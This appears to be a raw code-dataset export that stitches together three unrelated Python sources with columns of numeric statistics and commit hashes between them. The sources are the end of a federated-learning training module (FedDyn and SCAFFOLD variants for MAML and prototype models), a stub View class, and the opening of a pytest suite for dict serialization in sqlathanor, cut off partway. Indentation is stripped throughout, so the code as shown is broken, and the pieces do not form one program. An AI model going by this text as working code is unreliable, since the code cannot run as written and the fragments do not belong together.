val_loss = loss_fn(val_logits, curr_val_y.reshape(-1).long()) / list(curr_val_y.size())[0]
# FedDyn version!
# Add Dynamic loss
# Get model parameter
mld_pars = []
for name, param in model.named_parameters():
mld_pars.append(param.reshape(-1))
mld_pars = torch.cat(mld_pars)
loss_lambda = -torch.sum(mld_pars * lambda_model)
loss_server = -alpha*torch.sum(mld_pars * server_model) + alpha/2 * torch.sum(mld_pars*mld_pars)
val_loss = val_loss + loss_lambda + loss_server
# Update the model's meta-parameters to optimize the query
# losses across all of the tasks sampled in this batch.
# This unrolls through the gradient steps.
val_loss.backward()
torch.nn.utils.clip_grad_norm_(parameters=model.parameters(), max_norm=max_norm) # Clip gradients
optimizer_.step()
if print_per != 0 and ((k+1) % print_per == 0):
loss_trn, acc_trn = get_maml_acc_loss(trn_x, trn_y, model, model_func, meta_learning_rate, num_grad_step, dataset_name, weight_decay_data=weight_decay)
print("Step %3d, Training Accuracy: %.4f, Loss: %.4f, alpha %f"
%((k+1), acc_trn, loss_trn, alpha))
model.train()
# Freeze model
for params in model.parameters():
params.requires_grad = False
model.eval()
return model
def train_dyn_proto_model(alpha, lambda_model, server_model, model, trn_x, trn_y, learning_rate, batch_size, K, print_per, weight_decay, dataset_name):
n_trn = trn_x.shape[0]
# Get one hot vectors for the labels
unique, unique_indices = np.unique(trn_y.reshape(-1), return_inverse=True)
trn_y_one_hot = np.zeros((n_trn, np.max(unique_indices) + 1))
trn_y_one_hot[np.arange(n_trn), unique_indices] = 1
trn_load = torch.utils.data.DataLoader(Dataset(trn_x, trn_y_one_hot, train=True, dataset_name=dataset_name),
batch_size=batch_size, shuffle=True, num_workers=num_workers)
optimizer = torch.optim.SGD(model.parameters(), lr=learning_rate, weight_decay=weight_decay)
model.train(); model = model.to(device); model.proto = True
loss_fn = torch.nn.CrossEntropyLoss(reduction='sum')
k = 0
while(k < K):
# Get two batches of data, one as sample and one as query.
while True:
data_list = []
while len(data_list) != 2:
for data in trn_load:
data_list.append([data[0], data[1]])
if len(data_list) == 2:
break
# To get a meaningful loss, we need to have at least one sample in the sample set for all classes in query set
sampl_cls = np.unique(data_list[0][1]); query_cls = np.unique(data_list[1][1]); is_violated = False
for elem in query_cls:
if not elem in sampl_cls:
is_violated = True
if not is_violated:
break
# curr_sampl_y is BS x nCls. What if we do not have one class in the batch? That will make the loss NaN.
# make curr_sampl_y as BS x Current Classes
curr_sampl_y = data_list[0][1]; curr_query_y = data_list[1][1]
non_zero_classes = torch.where(torch.sum(curr_sampl_y, 0).reshape(-1,1) != 0)[0]
curr_sampl_y = curr_sampl_y[:,non_zero_classes].to(device)
curr_query_y = curr_query_y[:,non_zero_classes].to(device)
# Concatenate input
curr_sampl_x = data_list[0][0].to(device)
curr_query_x = data_list[1][0].to(device)
curr_x = torch.cat((curr_sampl_x, curr_query_x), 0)
feature_ = model(curr_x)
feature_space_sampl = feature_[:len(curr_sampl_x)]
feature_space_query = feature_[len(curr_sampl_x):]
# Get logits of query batch based on applying kNN to sample batch
logits_cen = get_logits_proto_cen(feature_space_sampl, curr_sampl_y, feature_space_query)
# Get negative log loss of the query class
loss = loss_fn(logits_cen, torch.argmax(curr_query_y, 1).reshape(-1).long()) / list(curr_query_y.size())[0]
# FedDyn version!
# Add Dynamic loss
# Get model parameter
mld_pars = []
for name, param in model.named_parameters():
mld_pars.append(param.reshape(-1))
mld_pars = torch.cat(mld_pars)
loss_lambda = -torch.sum(mld_pars * lambda_model)
loss_server = -alpha*torch.sum(mld_pars * server_model) + alpha/2 * torch.sum(mld_pars*mld_pars)
loss = loss + loss_lambda + loss_server
optimizer.zero_grad()
loss.backward()
torch.nn.utils.clip_grad_norm_(parameters=model.parameters(), max_norm=max_norm) # Clip gradients
optimizer.step()
k += 1
if print_per != 0 and (k % print_per == 0):
acc = np.mean(np.argmax(logits_cen.detach().cpu().numpy(), axis=1) == np.argmax(curr_query_y.cpu().numpy(), axis=1))
loss = loss.item()
print("Step %3d, Batch Acc: %.4f, Loss: %.4f, alpha: %.4f" %(k, acc, loss, alpha))
model.proto = False
return model
### SCAFFOLD methods
def train_SCAF_model(curr_state_params_diff, model, trn_x, trn_y, learning_rate, batch_size, K, print_per, weight_decay, dataset_name):
n_trn = trn_x.shape[0]
trn_load = torch.utils.data.DataLoader(Dataset(trn_x, trn_y, train=True, dataset_name=dataset_name),
batch_size=batch_size, shuffle=True, num_workers=num_workers)
loss_fn = torch.nn.CrossEntropyLoss(reduction='sum')
optimizer = torch.optim.SGD(model.parameters(), lr=learning_rate, weight_decay=weight_decay)
model.train(); model = model.to(device)
if print_per != 0:
loss_trn, acc_trn = get_acc_loss(trn_x, trn_y, model, dataset_name, weight_decay)
print("Step %3d, Training Accuracy: %.4f, Loss: %.4f" %(0,acc_trn,loss_trn))
model.train()
k=0
while(k < K):
for data in trn_load:
batch_x, batch_y = data[0].to(device), data[1].to(device)
y_pred = model(batch_x)
optimizer.zero_grad()
loss = loss_fn(y_pred, batch_y.reshape(-1).long()) / list(batch_y.size())[0]
# Get model parameter
mld_pars = []
for name, param in model.named_parameters():
mld_pars.append(param.reshape(-1))
mld_pars = torch.cat(mld_pars)
loss_inner = torch.sum(curr_state_params_diff * mld_pars)
loss = loss + loss_inner
loss.backward()
torch.nn.utils.clip_grad_norm_(parameters=model.parameters(), max_norm=max_norm) # Clip gradients to prevent exploding
optimizer.step()
k += 1
if print_per != 0 and (k % print_per == 0):
loss_trn, acc_trn = get_acc_loss(trn_x, trn_y, model, dataset_name, weight_decay)
print("Step %3d, Training Accuracy: %.4f, Loss: %.4f" %(k,acc_trn,loss_trn))
model.train()
if k == K:
break
# Freeze model
for params in model.parameters():
params.requires_grad = False
model.eval()
return model
def train_SCAF_meta_model_MAML(curr_state_params_diff, model_func, model, trn_x, trn_y, num_grad_step, meta_learning_rate, learning_rate, batch_size, K, print_per, weight_decay, dataset_name):
n_trn = trn_x.shape[0]
trn_load = torch.utils.data.DataLoader(Dataset(trn_x, trn_y, train=True, dataset_name=dataset_name),
batch_size=batch_size, shuffle=True, num_workers=num_workers)
loss_fn = torch.nn.CrossEntropyLoss(reduction='sum')
model.train(); model = model.to(device)
n_par = len(get_mdl_params([model])[0])
optimizer_ = torch.optim.SGD(model.parameters(), lr=learning_rate, weight_decay=weight_decay)
inner_opt = torch.optim.SGD(model.parameters(), lr=meta_learning_rate, weight_decay=weight_decay)
if print_per != 0:
loss_trn, acc_trn = get_maml_acc_loss(trn_x, trn_y, model, model_func, meta_learning_rate, num_grad_step, dataset_name, weight_decay_data=weight_decay)
print("Step %3d, Training Accuracy: %.4f, Loss: %.4f, Higher Library" %(0, acc_trn, loss_trn))
model.train()
for k in range(K):
data_list = []
while len(data_list) != 2:
for data in trn_load:
data_list.append([data[0], data[1]])
if len(data_list) == 2:
break
curr_trn_x, curr_trn_y = data_list[0][0].to(device), data_list[0][1].to(device)
curr_val_x, curr_val_y = data_list[1][0].to(device), data_list[1][1].to(device)
# Higher library
optimizer_.zero_grad()
with torch.backends.cudnn.flags(enabled=False):
with higher.innerloop_ctx(model, inner_opt, copy_initial_weights=False) as (fnet, diffopt):
# Optimize the likelihood of the support set by taking
# gradient steps w.r.t. the model's parameters.
# This adapts the model's meta-parameters to the task.
# higher is able to automatically keep copies of
# your network's parameters as they are being updated.
for _ in range(num_grad_step):
trn_logits = fnet(curr_trn_x)
trn_loss = loss_fn(trn_logits, curr_trn_y.reshape(-1).long()) / list(curr_trn_y.size())[0]
diffopt.step(trn_loss)
# The final set of adapted parameters will induce some
# final loss and accuracy on the query dataset.
# These will be used to update the model's meta-parameters.
val_logits = fnet(curr_val_x)
val_loss = loss_fn(val_logits, curr_val_y.reshape(-1).long()) / list(curr_val_y.size())[0]
# Get model parameter
mld_pars = []
for name, param in model.named_parameters():
mld_pars.append(param.reshape(-1))
mld_pars = torch.cat(mld_pars)
loss_inner = torch.sum(mld_pars * curr_state_params_diff)
val_loss = val_loss + loss_inner
# Update the model's meta-parameters to optimize the query
# losses across all of the tasks sampled in this batch.
# This unrolls through the gradient steps.
val_loss.backward()
torch.nn.utils.clip_grad_norm_(parameters=model.parameters(), max_norm=max_norm) # Clip gradients
optimizer_.step()
if print_per != 0 and ((k+1) % print_per == 0):
loss_trn, acc_trn = get_maml_acc_loss(trn_x, trn_y, model, model_func, meta_learning_rate, num_grad_step, dataset_name, weight_decay_data=weight_decay)
print("Step %3d, Training Accuracy: %.4f, Loss: %.4f"
%((k+1), acc_trn, loss_trn))
model.train()
# Freeze model
for params in model.parameters():
params.requires_grad = False
model.eval()
return model
def train_SCAF_proto_model(curr_state_params_diff, model, trn_x, trn_y, learning_rate, batch_size, K, print_per, weight_decay, dataset_name):
n_trn = trn_x.shape[0]
# Get one hot vectors for the labels
unique, unique_indices = np.unique(trn_y.reshape(-1), return_inverse=True)
trn_y_one_hot = np.zeros((n_trn, np.max(unique_indices) + 1))
trn_y_one_hot[np.arange(n_trn), unique_indices] = 1
trn_load = torch.utils.data.DataLoader(Dataset(trn_x, trn_y_one_hot, train=True, dataset_name=dataset_name),
batch_size=batch_size, shuffle=True, num_workers=num_workers)
optimizer = torch.optim.SGD(model.parameters(), lr=learning_rate, weight_decay=weight_decay)
model.train(); model = model.to(device); model.proto = True
loss_fn = torch.nn.CrossEntropyLoss(reduction='sum')
k = 0
while(k < K):
# Get two batches of data, one as sample and one as query.
while True:
data_list = []
while len(data_list) != 2:
for data in trn_load:
data_list.append([data[0], data[1]])
if len(data_list) == 2:
break
# To get a meaningful loss, we need to have at least one sample in the sample set for all classes in query set
sampl_cls = np.unique(data_list[0][1]); query_cls = np.unique(data_list[1][1]); is_violated = False
for elem in query_cls:
if not elem in sampl_cls:
is_violated = True
if not is_violated:
break
# curr_sampl_y is BS x nCls. What if we do not have one class in the batch? That will make the loss NaN.
# make curr_sampl_y as BS x Current Classes
curr_sampl_y = data_list[0][1]; curr_query_y = data_list[1][1]
non_zero_classes = torch.where(torch.sum(curr_sampl_y, 0).reshape(-1,1) != 0)[0]
curr_sampl_y = curr_sampl_y[:,non_zero_classes].to(device)
curr_query_y = curr_query_y[:,non_zero_classes].to(device)
# Concatenate input
curr_sampl_x = data_list[0][0].to(device)
curr_query_x = data_list[1][0].to(device)
curr_x = torch.cat((curr_sampl_x, curr_query_x), 0)
feature_ = model(curr_x)
feature_space_sampl = feature_[:len(curr_sampl_x)]
feature_space_query = feature_[len(curr_sampl_x):]
# Get logits of query batch based on applying kNN to sample batch
logits_cen = get_logits_proto_cen(feature_space_sampl, curr_sampl_y, feature_space_query)
# Get negative log loss of the query class
loss = loss_fn(logits_cen, torch.argmax(curr_query_y, 1).reshape(-1).long()) / list(curr_query_y.size())[0]
# Get model parameter
mld_pars = []
for name, param in model.named_parameters():
mld_pars.append(param.reshape(-1))
mld_pars = torch.cat(mld_pars)
loss_inner = torch.sum(mld_pars * curr_state_params_diff)
loss = loss + loss_inner
optimizer.zero_grad()
loss.backward()
torch.nn.utils.clip_grad_norm_(parameters=model.parameters(), max_norm=max_norm) # Clip gradients
optimizer.step()
k += 1
if print_per != 0 and (k % print_per == 0):
acc = np.mean(np.argmax(logits_cen.detach().cpu().numpy(), axis=1) == np.argmax(curr_query_y.cpu().numpy(), axis=1))
loss = loss.item()
print("Step %3d, Batch Acc: %.4f, Loss %.4f" %((k+1), acc, loss))
model.proto = False
return model
| 51.399773
| 202
| 0.6231
| 6,755
| 45,386
| 3.876536
| 0.050481
| 0.032346
| 0.009356
| 0.009776
| 0.891889
| 0.87352
| 0.852784
| 0.837089
| 0.828611
| 0.818033
| 0
| 0.019192
| 0.265258
| 45,386
| 883
| 203
| 51.399774
| 0.766066
| 0.097078
| 0
| 0.734277
| 0
| 0.023585
| 0.051604
| 0
| 0
| 0
| 0
| 0
| 0.003145
| 1
| 0.036164
| false
| 0
| 0.004717
| 0
| 0.078616
| 0.092767
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
fcf2e11ecc7b28679ba07a7cea3aeef3bc9cc8ee
| 159
|
py
|
Python
|
View.py
|
binary-b/python-checkers
|
6d48c74f45599f8ec166023ec731378a49e1ea67
|
[
"MIT"
] | null | null | null |
View.py
|
binary-b/python-checkers
|
6d48c74f45599f8ec166023ec731378a49e1ea67
|
[
"MIT"
] | null | null | null |
View.py
|
binary-b/python-checkers
|
6d48c74f45599f8ec166023ec731378a49e1ea67
|
[
"MIT"
] | null | null | null |
class View:
def __init__ (self):
pass
def update (self):
pass
def draw (self):
pass
def event (self, ev):
pass
| 15.9
| 25
| 0.490566
| 19
| 159
| 3.894737
| 0.526316
| 0.324324
| 0.445946
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.421384
| 159
| 9
| 26
| 17.666667
| 0.804348
| 0
| 0
| 0.444444
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.444444
| false
| 0.444444
| 0
| 0
| 0.555556
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 1
| 0
|
0
| 7
|
1e3dfe8521c91872931d9dc80392253be960a4cd
| 36,775
|
py
|
Python
|
tests/test_dict_support.py
|
edupo/sqlathanor
|
a5cfd349d092b25a3ffb3950b996b13878e1db17
|
[
"MIT"
] | 101
|
2018-07-21T00:20:59.000Z
|
2022-02-09T21:33:09.000Z
|
tests/test_dict_support.py
|
edupo/sqlathanor
|
a5cfd349d092b25a3ffb3950b996b13878e1db17
|
[
"MIT"
] | 85
|
2018-06-16T02:15:08.000Z
|
2022-02-24T14:57:24.000Z
|
tests/test_dict_support.py
|
edupo/sqlathanor
|
a5cfd349d092b25a3ffb3950b996b13878e1db17
|
[
"MIT"
] | 6
|
2018-07-25T09:51:02.000Z
|
2022-02-24T14:04:27.000Z
|
# -*- coding: utf-8 -*-
"""
******************************************
tests.test_dict_support
******************************************
Tests for :class:`dict <python:dict>` serialization/de-serialization support.
"""
# pylint: disable=line-too-long,protected-access
import pytest
import datetime
from validator_collection import checkers
from tests.fixtures import db_engine, tables, base_model, db_session, \
model_single_pk, instance_single_pk, model_complex_postgresql, instance_postgresql
from sqlathanor.errors import CSVStructureError, DeserializationError, \
MaximumNestingExceededError, MaximumNestingExceededWarning, \
SerializableAttributeError, InvalidFormatError, ValueSerializationError, \
ValueDeserializationError, DeserializableAttributeError, DeserializationError, \
ExtraKeyError
from sqlathanor.utilities import are_dicts_equivalent
@pytest.mark.parametrize('supports_serialization, hybrid_value, format, max_nesting, current_nesting, expected_result, warning, error', [
(False, None, 'invalid', 0, 0, None, None, InvalidFormatError),
(False, None, 'dict', 0, 0, None, None, SerializableAttributeError),
(False, None, 'json', 0, 0, None, None, SerializableAttributeError),
(False, None, 'yaml', 0, 0, None, None, SerializableAttributeError),
(False, None, 'csv', 0, 0, None, None, SerializableAttributeError),
(False, None, 'dict', 0, 3, None, None, MaximumNestingExceededError),
(False, None, 'json', 0, 3, None, None, MaximumNestingExceededError),
(False, None, 'yaml', 0, 3, None, None, MaximumNestingExceededError),
(False, None, 'csv', 0, 3, None, None, MaximumNestingExceededError),
(True, 'test value', 'dict', 0, 0, { 'id': 1, 'name': 'serialized', 'hybrid_value': 'test value' }, None, None),
(True, 'test value', 'json', 0, 0, { 'id': 1, 'name': 'serialized', 'hybrid_value': 'test value' }, MaximumNestingExceededWarning, None),
(True, 'test value', 'yaml', 0, 0, { 'id': 1, 'name': 'serialized', 'hybrid_value': 'test value' }, MaximumNestingExceededWarning, None),
(True, 'test value', 'csv', 0, 0, { 'id': 1, 'name': 'serialized', 'smallint_column': 2, 'hybrid_value': 'test value', 'time_delta': 86400.0 }, None, None),
(True, { 'nested_key': 'test', 'nested_key2': 'test2' }, 'dict', 0, 0, { 'id': 1, 'name': 'serialized', 'hybrid_value': { 'nested_key': 'test', 'nested_key2': 'test2' } }, None, None),
(True, { 'nested_key': 'test', 'nested_key2': 'test2' }, 'json', 0, 0, { 'id': 1, 'name': 'serialized', 'hybrid_value': { 'nested_key': 'test', 'nested_key2': 'test2' } }, MaximumNestingExceededWarning, None),
(True, { 'nested_key': 'test', 'nested_key2': 'test2' }, 'yaml', 0, 0, { 'id': 1, 'name': 'serialized', 'hybrid_value': { 'nested_key': 'test', 'nested_key2': 'test2' } }, MaximumNestingExceededWarning, None),
(True, { 'nested_key': 'test', 'nested_key2': 'test2' }, 'csv', 0, 0, { 'id': 1, 'name': 'serialized', 'smallint_column': 2 }, None, ValueSerializationError),
(True, [{ 'nested_key': 'test', 'nested_key2': 'test2' }], 'dict', 1, 0, { 'id': 1, 'name': 'serialized', 'hybrid_value': [{ 'nested_key': 'test', 'nested_key2': 'test2' }] }, None, None),
(True, { 'nested_key': 'test', 'nested_key2': 'test2' }, 'json', 1, 0, { 'id': 1, 'name': 'serialized', 'addresses': [], 'hybrid_value': { 'nested_key': 'test', 'nested_key2': 'test2' } }, None, None),
(True, { 'nested_key': 'test', 'nested_key2': 'test2' }, 'yaml', 1, 0, { 'id': 1, 'name': 'serialized', 'addresses': [], 'hybrid_value': { 'nested_key': 'test', 'nested_key2': 'test2' } }, None, None),
(True, { 'nested_key': 'test', 'nested_key2': 'test2' }, 'csv', 1, 0, { 'id': 1, 'name': 'serialized', 'smallint_column': 2, 'hybrid_value': { 'nested_key': 'test', 'nested_key2': 'test2' } }, None, ValueSerializationError),
(True, { 'nested_key': {'second-nesting-key': 'test'}, 'nested_key2': 'test2' }, 'dict', 0, 0, { 'id': 1, 'name': 'serialized', 'hybrid_value': { 'nested_key': {'second-nesting-key': 'test'}, 'nested_key2': 'test2' } }, None, None),
(True, { 'nested_key': {'second-nesting-key': {'third-nest': 3} }, 'nested_key2': 'test2' }, 'dict', 0, 0, { 'id': 1, 'name': 'serialized', 'hybrid_value': { 'nested_key': {'second-nesting-key': {'third-nest': 3} }, 'nested_key2': 'test2' } }, None, None),
])
def test__to_dict(request,
instance_single_pk,
instance_postgresql,
supports_serialization,
hybrid_value,
format,
max_nesting,
current_nesting,
expected_result,
warning,
error):
if supports_serialization:
target = instance_postgresql[0][0]
else:
target = instance_single_pk[0]
target.hybrid = hybrid_value
if not error and not warning:
result = target._to_dict(format,
max_nesting = max_nesting,
current_nesting = current_nesting)
assert isinstance(result, dict)
print('RESULT:')
print(result)
print('\nEXPECTED:')
print(expected_result)
for key in result:
assert key in expected_result
assert expected_result[key] == result[key]
for key in expected_result:
assert key in result
assert result[key] == expected_result[key]
assert are_dicts_equivalent(result, expected_result) is True
elif not warning:
with pytest.raises(error):
result = target._to_dict(format,
max_nesting = max_nesting,
current_nesting = current_nesting)
elif not error:
with pytest.warns(warning):
result = target._to_dict(format,
max_nesting = max_nesting,
current_nesting = current_nesting)
assert isinstance(result, dict)
for key in result:
assert key in expected_result
assert expected_result[key] == result[key]
for key in expected_result:
assert key in result
assert result[key] == expected_result[key]
assert are_dicts_equivalent(result, expected_result) is True
@pytest.mark.parametrize('supports_serialization, hybrid_value, format, max_nesting, current_nesting, expected_result, extra_keys, error_on_extra_keys, drop_extra_keys, warning, error', [
(False, None, 'invalid', 0, 0, None, None, True, False, None, InvalidFormatError),
(False, None, 'dict', 0, 0, None, None, True, False, None, (SerializableAttributeError, DeserializableAttributeError)),
(False, None, 'json', 0, 0, None, None, True, False, None, (SerializableAttributeError, DeserializableAttributeError)),
(False, None, 'yaml', 0, 0, None, None, True, False, None, (SerializableAttributeError, DeserializableAttributeError)),
(False, None, 'csv', 0, 0, None, None, True, False, None, (SerializableAttributeError, DeserializableAttributeError)),
(True, 'test value', 'dict', 0, 0, { 'id': 1, 'name': 'deserialized', 'hybrid': 'test value' }, None, True, False, None, None),
(True, 'test value', 'json', 0, 0, { 'id': 1, 'name': 'deserialized', 'hybrid': 'test value' }, None, True, False, MaximumNestingExceededWarning, None),
(True, 'test value', 'yaml', 0, 0, { 'id': 1, 'name': 'deserialized', 'hybrid': 'test value' }, None, True, False, MaximumNestingExceededWarning, None),
(True, 'test value', 'csv', 0, 0, { 'id': 1, 'name': 'deserialized', 'smallint_column': 2, 'hybrid': 'test value', 'time_delta': datetime.timedelta(1) }, None, True, False, None, None),
(True, { 'nested_key': 'test', 'nested_key2': 'test2' }, 'dict', 0, 0, { 'id': 1, 'name': 'deserialized', 'hybrid': { 'nested_key': 'test', 'nested_key2': 'test2' } }, None, True, False, None, None),
(True, { 'nested_key': 'test', 'nested_key2': 'test2' }, 'json', 0, 0, { 'id': 1, 'name': 'deserialized', 'hybrid': { 'nested_key': 'test', 'nested_key2': 'test2' } }, None, True, False, MaximumNestingExceededWarning, None),
(True, { 'nested_key': 'test', 'nested_key2': 'test2' }, 'yaml', 0, 0, { 'id': 1, 'name': 'deserialized', 'hybrid': { 'nested_key': 'test', 'nested_key2': 'test2' } }, None, True, False, MaximumNestingExceededWarning, None),
(True, { 'nested_key': 'test', 'nested_key2': 'test2' }, 'csv', 0, 0, { 'id': 1, 'name': 'deserialized', 'smallint_column': 2, 'time_delta': datetime.timedelta(1) }, None, True, False, None, ValueSerializationError),
(True, [{ 'nested_key': 'test', 'nested_key2': 'test2' }], 'dict', 1, 0, { 'id': 1, 'name': 'deserialized', 'hybrid': [{ 'nested_key': 'test', 'nested_key2': 'test2' }] }, None, True, False, None, None),
(True, { 'nested_key': 'test', 'nested_key2': 'test2' }, 'json', 1, 0, { 'id': 1, 'name': 'deserialized', 'addresses': [], 'hybrid': { 'nested_key': 'test', 'nested_key2': 'test2' } }, None, True, False, None, None),
(True, { 'nested_key': 'test', 'nested_key2': 'test2' }, 'yaml', 1, 0, { 'id': 1, 'name': 'deserialized', 'addresses': [], 'hybrid': { 'nested_key': 'test', 'nested_key2': 'test2' } }, None, True, False, None, None),
(True, { 'nested_key': 'test', 'nested_key2': 'test2' }, 'csv', 1, 0, { 'id': 1, 'name': 'deserialized', 'smallint_column': 2, 'hybrid': { 'nested_key': 'test', 'nested_key2': 'test2' }, 'time_delta': datetime.timedelta(1) }, None, True, False, None, ValueSerializationError),
(True, { 'nested_key': {'second-nesting-key': 'test'}, 'nested_key2': 'test2' }, 'dict', 0, 0, { 'id': 1, 'name': 'deserialized', 'hybrid': { 'nested_key': {'second-nesting-key': 'test'}, 'nested_key2': 'test2' } }, None, True, False, None, None),
(True, { 'nested_key': {'second-nesting-key': {'third-nest': 3} }, 'nested_key2': 'test2' }, 'dict', 0, 0, { 'id': 1, 'name': 'deserialized', 'hybrid': { 'nested_key': {'second-nesting-key': {'third-nest': 3} }, 'nested_key2': 'test2' } }, None, True, False, None, None),
# Error on Extra Keys
(True, 'test value', 'dict', 0, 0, { 'id': 1, 'name': 'deserialized', 'hybrid': 'test value' }, { 'extra': 'test' }, True, False, None, ExtraKeyError),
(True, 'test value', 'json', 0, 0, { 'id': 1, 'name': 'deserialized', 'hybrid': 'test value' }, { 'extra': 'test' }, True, False, MaximumNestingExceededWarning, ExtraKeyError),
(True, 'test value', 'yaml', 0, 0, { 'id': 1, 'name': 'deserialized', 'hybrid': 'test value' }, { 'extra': 'test' }, True, False, MaximumNestingExceededWarning, ExtraKeyError),
(True, 'test value', 'csv', 0, 0, { 'id': 1, 'name': 'deserialized', 'smallint_column': 2, 'hybrid': 'test value', 'time_delta': datetime.timedelta(1) }, { 'extra': 'test' }, True, False, None, ExtraKeyError),
# Include Extra Keys in result
(True, 'test value', 'dict', 0, 0, { 'id': 1, 'name': 'deserialized', 'hybrid': 'test value', 'extra': 'test' }, { 'extra': 'test' }, False, False, None, None),
(True, 'test value', 'json', 0, 0, { 'id': 1, 'name': 'deserialized', 'hybrid': 'test value', 'extra': 'test' }, { 'extra': 'test' }, False, False, MaximumNestingExceededWarning, None),
(True, 'test value', 'yaml', 0, 0, { 'id': 1, 'name': 'deserialized', 'hybrid': 'test value', 'extra': 'test' }, { 'extra': 'test' }, False, False, MaximumNestingExceededWarning, None),
(True, 'test value', 'csv', 0, 0, { 'id': 1, 'name': 'deserialized', 'smallint_column': 2, 'hybrid': 'test value', 'extra': 'test', 'time_delta': datetime.timedelta(1) }, { 'extra': 'test' }, False, False, None, None),
# Exclude Extra Keys from result
(True, 'test value', 'dict', 0, 0, { 'id': 1, 'name': 'deserialized', 'hybrid': 'test value', }, { 'extra': 'test' }, False, True, None, None),
(True, 'test value', 'json', 0, 0, { 'id': 1, 'name': 'deserialized', 'hybrid': 'test value', }, { 'extra': 'test' }, False, True, MaximumNestingExceededWarning, None),
(True, 'test value', 'yaml', 0, 0, { 'id': 1, 'name': 'deserialized', 'hybrid': 'test value', }, { 'extra': 'test' }, False, True, MaximumNestingExceededWarning, None),
(True, 'test value', 'csv', 0, 0, { 'id': 1, 'name': 'deserialized', 'smallint_column': 2, 'hybrid': 'test value', 'time_delta': datetime.timedelta(1) }, { 'extra': 'test' }, False, True, None, None),
])
def test_model__parse_dict(request,
model_single_pk,
model_complex_postgresql,
instance_single_pk,
instance_postgresql,
supports_serialization,
hybrid_value,
format,
max_nesting,
current_nesting,
extra_keys,
error_on_extra_keys,
drop_extra_keys,
expected_result,
warning,
error):
if supports_serialization:
target = model_complex_postgresql[0]
source = instance_postgresql[0][0]
else:
target = model_single_pk[0]
source = instance_single_pk[0]
target.hybrid = hybrid_value
if not error and not warning:
input_data = source._to_dict(format,
max_nesting = max_nesting,
current_nesting = current_nesting)
if extra_keys:
for key in extra_keys:
input_data[key] = extra_keys[key]
result = target._parse_dict(input_data,
format,
error_on_extra_keys = error_on_extra_keys,
drop_extra_keys = drop_extra_keys)
if not error_on_extra_keys and drop_extra_keys:
for key in extra_keys:
assert key not in result
elif not error_on_extra_keys and not drop_extra_keys:
for key in extra_keys:
assert key in result
assert are_dicts_equivalent(result, expected_result) is True
elif not warning:
with pytest.raises(error):
input_data = source._to_dict(format,
max_nesting = max_nesting,
current_nesting = current_nesting)
if extra_keys:
for key in extra_keys:
input_data[key] = extra_keys[key]
result = target._parse_dict(input_data,
format,
error_on_extra_keys = error_on_extra_keys,
drop_extra_keys = drop_extra_keys)
elif not error:
with pytest.warns(warning):
input_data = source._to_dict(format,
max_nesting = max_nesting,
current_nesting = current_nesting)
if extra_keys:
for key in extra_keys:
input_data[key] = extra_keys[key]
result = target._parse_dict(input_data,
format,
error_on_extra_keys = error_on_extra_keys,
drop_extra_keys = drop_extra_keys)
assert isinstance(result, dict)
for key in result:
assert key in expected_result
assert expected_result[key] == result[key]
for key in expected_result:
assert key in result
assert result[key] == expected_result[key]
if not error_on_extra_keys and drop_extra_keys:
for key in extra_keys:
assert key not in result
elif not error_on_extra_keys and not drop_extra_keys:
for key in extra_keys:
assert key in result
assert are_dicts_equivalent(result, expected_result) is True
@pytest.mark.parametrize('supports_serialization, hybrid_value, format, max_nesting, current_nesting, expected_result, extra_keys, error_on_extra_keys, drop_extra_keys, warning, error', [
(False, None, 'invalid', 0, 0, None, None, True, False, None, InvalidFormatError),
(False, None, 'dict', 0, 0, None, None, True, False, None, (SerializableAttributeError, DeserializableAttributeError)),
(False, None, 'json', 0, 0, None, None, True, False, None, (SerializableAttributeError, DeserializableAttributeError)),
(False, None, 'yaml', 0, 0, None, None, True, False, None, (SerializableAttributeError, DeserializableAttributeError)),
(False, None, 'csv', 0, 0, None, None, True, False, None, (SerializableAttributeError, DeserializableAttributeError)),
(True, 'test value', 'dict', 0, 0, { 'id': 1, 'name': 'deserialized', 'hybrid': 'test value' }, None, True, False, None, None),
(True, 'test value', 'json', 0, 0, { 'id': 1, 'name': 'deserialized', 'hybrid': 'test value' }, None, True, False, MaximumNestingExceededWarning, None),
(True, 'test value', 'yaml', 0, 0, { 'id': 1, 'name': 'deserialized', 'hybrid': 'test value' }, None, True, False, MaximumNestingExceededWarning, None),
(True, 'test value', 'csv', 0, 0, { 'id': 1, 'name': 'deserialized', 'smallint_column': 2, 'hybrid': 'test value', 'time_delta': datetime.timedelta(1) }, None, True, False, None, None),
(True, { 'nested_key': 'test', 'nested_key2': 'test2' }, 'dict', 0, 0, { 'id': 1, 'name': 'deserialized', 'hybrid': { 'nested_key': 'test', 'nested_key2': 'test2' } }, None, True, False, None, None),
(True, { 'nested_key': 'test', 'nested_key2': 'test2' }, 'json', 0, 0, { 'id': 1, 'name': 'deserialized', 'hybrid': { 'nested_key': 'test', 'nested_key2': 'test2' } }, None, True, False, MaximumNestingExceededWarning, None),
(True, { 'nested_key': 'test', 'nested_key2': 'test2' }, 'yaml', 0, 0, { 'id': 1, 'name': 'deserialized', 'hybrid': { 'nested_key': 'test', 'nested_key2': 'test2' } }, None, True, False, MaximumNestingExceededWarning, None),
(True, { 'nested_key': 'test', 'nested_key2': 'test2' }, 'csv', 0, 0, { 'id': 1, 'name': 'deserialized', 'smallint_column': 2, 'time_delta': datetime.timedelta(1) }, None, True, False, None, ValueSerializationError),
(True, [{ 'nested_key': 'test', 'nested_key2': 'test2' }], 'dict', 1, 0, { 'id': 1, 'name': 'deserialized', 'hybrid': [{ 'nested_key': 'test', 'nested_key2': 'test2' }] }, None, True, False, None, None),
(True, { 'nested_key': 'test', 'nested_key2': 'test2' }, 'json', 1, 0, { 'id': 1, 'name': 'deserialized', 'addresses': [], 'hybrid': { 'nested_key': 'test', 'nested_key2': 'test2' } }, None, True, False, None, None),
